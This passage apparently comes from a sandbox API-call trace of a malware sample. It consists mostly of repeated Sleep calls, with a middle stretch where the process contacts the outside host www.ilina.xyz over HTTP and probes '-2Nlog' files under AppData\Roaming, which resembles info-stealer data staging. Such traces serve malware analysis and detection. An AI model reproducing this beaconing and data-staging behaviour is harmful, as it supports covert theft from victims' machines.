(dwMilliseconds=0x7d0) [0189.500] Sleep (dwMilliseconds=0x7d0) [0189.501] Sleep (dwMilliseconds=0x7d0) [0189.503] Sleep (dwMilliseconds=0x7d0) [0189.504] Sleep (dwMilliseconds=0x7d0) [0189.506] Sleep (dwMilliseconds=0x7d0) [0189.507] Sleep (dwMilliseconds=0x7d0) [0189.509] Sleep (dwMilliseconds=0x7d0) [0189.510] Sleep (dwMilliseconds=0x7d0) [0189.512] Sleep (dwMilliseconds=0x7d0) [0189.513] Sleep (dwMilliseconds=0x7d0) [0189.515] Sleep (dwMilliseconds=0x7d0) [0189.516] Sleep (dwMilliseconds=0x7d0) [0189.518] Sleep (dwMilliseconds=0x7d0) [0189.519] Sleep (dwMilliseconds=0x7d0) [0189.521] Sleep (dwMilliseconds=0x7d0) [0189.522] Sleep (dwMilliseconds=0x7d0) [0189.524] Sleep (dwMilliseconds=0x7d0) [0189.525] Sleep (dwMilliseconds=0x7d0) [0189.527] Sleep (dwMilliseconds=0x7d0) [0189.528] Sleep (dwMilliseconds=0x7d0) [0189.530] Sleep (dwMilliseconds=0x7d0) [0189.531] Sleep (dwMilliseconds=0x7d0) [0189.533] Sleep (dwMilliseconds=0x7d0) [0189.534] Sleep (dwMilliseconds=0x7d0) [0189.536] Sleep (dwMilliseconds=0x7d0) [0189.537] Sleep (dwMilliseconds=0x7d0) [0189.539] Sleep (dwMilliseconds=0x7d0) [0189.540] Sleep (dwMilliseconds=0x7d0) [0189.542] Sleep (dwMilliseconds=0x7d0) [0189.543] Sleep (dwMilliseconds=0x7d0) [0189.545] Sleep (dwMilliseconds=0x7d0) [0189.546] Sleep (dwMilliseconds=0x7d0) [0189.548] Sleep (dwMilliseconds=0x7d0) [0189.549] Sleep (dwMilliseconds=0x7d0) [0189.551] Sleep (dwMilliseconds=0x7d0) [0189.552] Sleep (dwMilliseconds=0x7d0) [0189.554] Sleep (dwMilliseconds=0x7d0) [0189.555] Sleep (dwMilliseconds=0x7d0) [0189.557] Sleep (dwMilliseconds=0x7d0) [0189.558] Sleep (dwMilliseconds=0x7d0) [0189.560] Sleep (dwMilliseconds=0x7d0) [0189.561] Sleep (dwMilliseconds=0x7d0) [0189.563] Sleep (dwMilliseconds=0x7d0) [0189.564] Sleep (dwMilliseconds=0x7d0) [0189.566] Sleep (dwMilliseconds=0x7d0) [0189.567] Sleep (dwMilliseconds=0x7d0) [0189.569] Sleep (dwMilliseconds=0x7d0) [0189.570] Sleep (dwMilliseconds=0x7d0) [0189.572] Sleep (dwMilliseconds=0x7d0) [0189.573] Sleep (dwMilliseconds=0x7d0) [0189.575] Sleep (dwMilliseconds=0x7d0) [0189.576] Sleep (dwMilliseconds=0x7d0) [0189.578] Sleep (dwMilliseconds=0x7d0) [0189.579] Sleep (dwMilliseconds=0x7d0) [0189.581] Sleep (dwMilliseconds=0x7d0) [0189.582] Sleep (dwMilliseconds=0x7d0) [0189.584] Sleep (dwMilliseconds=0x7d0) [0189.585] Sleep (dwMilliseconds=0x7d0) [0189.587] Sleep (dwMilliseconds=0x7d0) [0189.588] Sleep (dwMilliseconds=0x7d0) [0189.590] Sleep (dwMilliseconds=0x7d0) [0189.591] socket (af=2, type=1, protocol=6) returned 0x2634 [0189.592] getaddrinfo (in: pNodeName="www.ilina.xyz", pServiceName="80", pHints=0x878f758*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x878f788 | out: ppResult=0x878f788*=0x4d69620*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8884880*(sa_family=2, sin_port=0x50, sin_addr="104.21.4.240"), ai_next=0x5a70d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8884440*(sa_family=2, sin_port=0x50, sin_addr="172.67.187.58"), ai_next=0x0))) returned 0 [0189.611] connect (s=0x2634, name=0x8884880*(sa_family=2, sin_port=0x50, sin_addr="104.21.4.240"), namelen=16) returned 0 [0189.647] send (s=0x2634, buf=0xa10808a*, len=168, flags=0) returned 168 [0189.648] setsockopt (s=0x2634, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0189.648] recv (in: s=0x2634, buf=0x107df040, len=2048000, flags=0 | out: buf=0x107df040*) returned 756 [0189.714] closesocket (s=0x2634) returned 0 [0189.715] Sleep (dwMilliseconds=0x7d0) [0189.716] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.716] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.717] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0189.717] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0189.717] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.717] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.717] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0189.717] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0189.717] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.717] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.717] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0189.717] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0189.717] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.717] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.718] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0189.718] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0189.718] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.718] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.718] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0189.718] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894da80) returned 1 [0189.718] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.718] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.718] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0189.718] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0189.718] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.718] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.718] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0189.718] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894e0b0) returned 1 [0189.718] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.719] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.719] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0189.719] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d2a0) returned 1 [0189.719] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.719] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.719] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0189.719] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0189.719] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.719] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.719] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0189.719] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d180) returned 1 [0189.719] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.720] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0189.720] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0189.720] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894d8d0) returned 1 [0189.720] Sleep (dwMilliseconds=0x7d0) [0189.721] Sleep (dwMilliseconds=0x7d0) [0189.723] Sleep (dwMilliseconds=0x7d0) [0189.724] Sleep (dwMilliseconds=0x7d0) [0189.726] Sleep (dwMilliseconds=0x7d0) [0189.727] Sleep (dwMilliseconds=0x7d0) [0189.729] Sleep (dwMilliseconds=0x7d0) [0189.730] Sleep (dwMilliseconds=0x7d0) [0189.732] Sleep (dwMilliseconds=0x7d0) [0189.733] Sleep (dwMilliseconds=0x7d0) [0189.735] Sleep (dwMilliseconds=0x7d0) [0189.736] Sleep (dwMilliseconds=0x7d0) [0189.738] Sleep (dwMilliseconds=0x7d0) [0189.739] Sleep (dwMilliseconds=0x7d0) [0189.741] Sleep (dwMilliseconds=0x7d0) [0189.742] Sleep (dwMilliseconds=0x7d0) [0189.744] Sleep (dwMilliseconds=0x7d0) [0189.745] Sleep (dwMilliseconds=0x7d0) [0189.747] Sleep (dwMilliseconds=0x7d0) [0189.748] Sleep (dwMilliseconds=0x7d0) [0189.750] Sleep (dwMilliseconds=0x7d0) [0189.751] Sleep (dwMilliseconds=0x7d0) [0189.753] Sleep (dwMilliseconds=0x7d0) [0189.754] Sleep (dwMilliseconds=0x7d0) [0189.756] Sleep (dwMilliseconds=0x7d0) [0189.757] Sleep (dwMilliseconds=0x7d0) [0189.759] Sleep (dwMilliseconds=0x7d0) [0189.760] Sleep (dwMilliseconds=0x7d0) [0189.762] Sleep (dwMilliseconds=0x7d0) [0189.763] Sleep (dwMilliseconds=0x7d0) [0189.765] Sleep (dwMilliseconds=0x7d0) [0189.766] Sleep (dwMilliseconds=0x7d0) [0189.768] Sleep (dwMilliseconds=0x7d0) [0189.769] Sleep (dwMilliseconds=0x7d0) [0189.771] Sleep (dwMilliseconds=0x7d0) [0189.772] Sleep (dwMilliseconds=0x7d0) [0189.774] Sleep (dwMilliseconds=0x7d0) [0189.775] Sleep (dwMilliseconds=0x7d0) [0189.777] Sleep (dwMilliseconds=0x7d0) [0189.778] Sleep (dwMilliseconds=0x7d0) [0189.780] Sleep (dwMilliseconds=0x7d0) [0189.781] Sleep (dwMilliseconds=0x7d0) [0189.783] Sleep (dwMilliseconds=0x7d0) [0189.784] Sleep (dwMilliseconds=0x7d0) [0189.786] Sleep (dwMilliseconds=0x7d0) [0189.787] Sleep (dwMilliseconds=0x7d0) [0189.789] Sleep (dwMilliseconds=0x7d0) [0189.790] Sleep (dwMilliseconds=0x7d0) [0189.792] Sleep (dwMilliseconds=0x7d0) [0189.793] Sleep (dwMilliseconds=0x7d0) [0189.795] Sleep (dwMilliseconds=0x7d0) [0189.796] Sleep (dwMilliseconds=0x7d0) [0189.798] Sleep (dwMilliseconds=0x7d0) [0189.799] Sleep (dwMilliseconds=0x7d0) [0189.801] Sleep (dwMilliseconds=0x7d0) [0189.802] Sleep (dwMilliseconds=0x7d0) [0189.805] Sleep (dwMilliseconds=0x7d0) [0189.807] Sleep (dwMilliseconds=0x7d0) [0189.808] Sleep (dwMilliseconds=0x7d0) [0189.810] Sleep (dwMilliseconds=0x7d0) [0189.811] Sleep (dwMilliseconds=0x7d0) [0189.814] Sleep (dwMilliseconds=0x7d0) [0189.816] Sleep (dwMilliseconds=0x7d0) [0189.817] Sleep (dwMilliseconds=0x7d0) [0189.819] Sleep (dwMilliseconds=0x7d0) [0189.820] Sleep (dwMilliseconds=0x7d0) [0189.822] Sleep (dwMilliseconds=0x7d0) [0189.823] Sleep (dwMilliseconds=0x7d0) [0189.825] Sleep (dwMilliseconds=0x7d0) [0189.826] Sleep (dwMilliseconds=0x7d0) [0189.828] Sleep (dwMilliseconds=0x7d0) [0189.829] Sleep (dwMilliseconds=0x7d0) [0189.831] Sleep (dwMilliseconds=0x7d0) [0189.832] Sleep (dwMilliseconds=0x7d0) [0189.834] Sleep (dwMilliseconds=0x7d0) [0189.835] Sleep (dwMilliseconds=0x7d0) [0189.837] Sleep (dwMilliseconds=0x7d0) [0189.838] Sleep (dwMilliseconds=0x7d0) [0189.840] Sleep (dwMilliseconds=0x7d0) [0189.841] Sleep (dwMilliseconds=0x7d0) [0189.843] Sleep (dwMilliseconds=0x7d0) [0189.844] Sleep (dwMilliseconds=0x7d0) [0189.846] Sleep (dwMilliseconds=0x7d0) [0189.847] Sleep (dwMilliseconds=0x7d0) [0189.849] Sleep (dwMilliseconds=0x7d0) [0189.850] Sleep (dwMilliseconds=0x7d0) [0189.852] Sleep (dwMilliseconds=0x7d0) [0189.853] Sleep (dwMilliseconds=0x7d0) [0189.855] Sleep (dwMilliseconds=0x7d0) [0189.856] Sleep (dwMilliseconds=0x7d0) [0189.858] Sleep (dwMilliseconds=0x7d0) [0189.859] Sleep (dwMilliseconds=0x7d0) [0189.861] Sleep (dwMilliseconds=0x7d0) [0189.862] Sleep (dwMilliseconds=0x7d0) [0189.864] Sleep (dwMilliseconds=0x7d0) [0189.865] Sleep (dwMilliseconds=0x7d0) [0189.867] Sleep (dwMilliseconds=0x7d0) [0189.868] Sleep (dwMilliseconds=0x7d0) [0189.870] Sleep (dwMilliseconds=0x7d0) [0189.871] Sleep (dwMilliseconds=0x7d0) [0189.873] Sleep (dwMilliseconds=0x7d0) [0189.874] Sleep (dwMilliseconds=0x7d0) [0189.876] Sleep (dwMilliseconds=0x7d0) [0189.877] Sleep (dwMilliseconds=0x7d0) [0189.879] Sleep (dwMilliseconds=0x7d0) [0189.880] Sleep (dwMilliseconds=0x7d0) [0189.882] Sleep (dwMilliseconds=0x7d0) [0189.883] Sleep (dwMilliseconds=0x7d0) [0189.885] Sleep (dwMilliseconds=0x7d0) [0189.886] Sleep (dwMilliseconds=0x7d0) [0189.888] Sleep (dwMilliseconds=0x7d0) [0189.889] Sleep (dwMilliseconds=0x7d0) [0189.891] Sleep (dwMilliseconds=0x7d0) [0189.892] Sleep (dwMilliseconds=0x7d0) [0189.894] Sleep (dwMilliseconds=0x7d0) [0189.895] Sleep (dwMilliseconds=0x7d0) [0189.897] Sleep (dwMilliseconds=0x7d0) [0189.898] Sleep (dwMilliseconds=0x7d0) [0189.900] Sleep (dwMilliseconds=0x7d0) [0189.901] Sleep (dwMilliseconds=0x7d0) [0189.903] Sleep (dwMilliseconds=0x7d0) [0189.904] Sleep (dwMilliseconds=0x7d0) [0189.906] Sleep (dwMilliseconds=0x7d0) [0189.907] Sleep (dwMilliseconds=0x7d0) [0189.909] Sleep (dwMilliseconds=0x7d0) [0189.910] Sleep (dwMilliseconds=0x7d0) [0189.912] Sleep (dwMilliseconds=0x7d0) [0189.915] Sleep (dwMilliseconds=0x7d0) [0189.916] Sleep (dwMilliseconds=0x7d0) [0189.918] Sleep (dwMilliseconds=0x7d0) [0189.919] Sleep (dwMilliseconds=0x7d0) [0189.921] Sleep (dwMilliseconds=0x7d0) [0189.922] Sleep (dwMilliseconds=0x7d0) [0189.924] Sleep (dwMilliseconds=0x7d0) [0189.925] Sleep (dwMilliseconds=0x7d0) [0189.927] Sleep (dwMilliseconds=0x7d0) [0189.928] Sleep (dwMilliseconds=0x7d0) [0189.930] Sleep (dwMilliseconds=0x7d0) [0189.931] Sleep (dwMilliseconds=0x7d0) [0189.933] Sleep (dwMilliseconds=0x7d0) [0189.934] Sleep (dwMilliseconds=0x7d0) [0189.936] Sleep (dwMilliseconds=0x7d0) [0189.937] Sleep (dwMilliseconds=0x7d0) [0189.939] Sleep (dwMilliseconds=0x7d0) [0189.940] Sleep (dwMilliseconds=0x7d0) [0189.942] Sleep (dwMilliseconds=0x7d0) [0189.943] Sleep (dwMilliseconds=0x7d0) [0189.945] Sleep (dwMilliseconds=0x7d0) [0189.946] Sleep (dwMilliseconds=0x7d0) [0189.948] Sleep (dwMilliseconds=0x7d0) [0189.949] Sleep (dwMilliseconds=0x7d0) [0189.951] Sleep (dwMilliseconds=0x7d0) [0189.952] Sleep (dwMilliseconds=0x7d0) [0189.954] Sleep (dwMilliseconds=0x7d0) [0189.955] Sleep (dwMilliseconds=0x7d0) [0189.957] Sleep (dwMilliseconds=0x7d0) [0189.958] Sleep (dwMilliseconds=0x7d0) [0189.960] Sleep (dwMilliseconds=0x7d0) [0189.961] Sleep 